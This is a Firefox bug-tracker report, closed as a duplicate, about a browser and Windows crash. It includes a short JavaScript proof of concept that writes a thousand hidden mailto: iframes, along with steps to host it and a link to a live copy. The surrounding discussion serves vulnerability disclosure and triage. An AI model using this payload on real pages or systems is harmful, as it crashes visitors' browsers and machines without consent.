Closed Bug 607344 Opened 15 years ago Closed 15 years ago

The browser and the windows crashed when you open the website.

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows 7
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 566893

People

(Reporter: bence, Assigned: bsterne)

References

(
URL
)

Details

(Whiteboard: [sg:dupe 566893])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.11) Gecko/20101012 Firefox/3.1.2 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.11) Gecko/20101012 Firefox/3.1.2 Just analyse the next script: <script type="text/javascript"> var i=0 for (i=0;i<=999;i++) { document.write("<iframe width=0px height=0px frameborder=0 border=0 src='mailto:bence@webbiztonsag.com?body=I love you budy. Thanks for virus too. Will format my pc, and pay a much money. Bye.'></iframe>"); } </script> Reproducible: Always Steps to Reproduce: 1.Go to Notepad -> Create a new file. 2.Copy this to the file: <script type="text/javascript"> var i=0 for (i=0;i<=999;i++) { document.write("<iframe width=0px height=0px frameborder=0 border=0 src='mailto:bence@webbiztonsag.com?body=I love you budy. Thanks for virus too. Will format my pc, and pay a much money. Bye.'></iframe>"); } </script> 3.Save as php. 4.Upload to a webserver and see it from the browser. 5.Your mozilla will crashed and the Outlook will started 1000 times. 6.Your windows crashed so you should restart your computer. Actual Results: You can see the Mozilla Firefox doesn't limit the mailto: variable. Expected Results: Repair this bug. And check the skype: msn: and other variable. I test it on Windows Vista/XP/7 with Mozilla Firefox latest version.
Component: General → Security
We need to not do anything for <iframe src=mailto:...>. Brandon, want to take this one?
Assignee: nobody → bsterne
Status: UNCONFIRMED → NEW
Ever confirmed: true
We have existing bugs on that, no?
I search but I haven't found this vulnerable in bugzilla but maybe I looked away. If the reproducing not work just view the source. view-source:http://sys0p.net/admin/ I use unescape on the website. Thanks, B
(In reply to comment #2) > We have existing bugs on that, no? Yes, bug 566893. In fact this bug is probably a DUP of that bug, unless the mailto: src for the iframe isn't necessary to cause the crash.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 566893]
Group: core-security
You need to log in before you can comment on or make changes to this bug.